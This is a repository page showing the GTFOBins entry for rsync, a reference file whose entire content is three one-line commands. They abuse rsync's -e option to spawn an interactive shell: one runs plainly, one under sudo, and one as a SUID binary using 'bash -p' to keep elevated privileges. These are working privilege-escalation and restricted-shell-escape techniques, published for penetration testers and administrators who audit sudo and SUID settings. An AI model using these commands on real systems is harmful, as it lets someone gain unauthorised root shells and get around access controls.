This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
cbab8b803a5e1b17cb2eba4d207c272bb5a35f2a
GTFOBins.github.io
/
_gtfobins
/
rsync.md
Andrea Cardaci
acf29564cb
Simplify rsync and add interactive execute
2018-08-19 11:43:26 +02:00
345 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-enabled
code
rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
code
sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
code
./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
Reference in New Issue
View Git Blame
Copy Permalink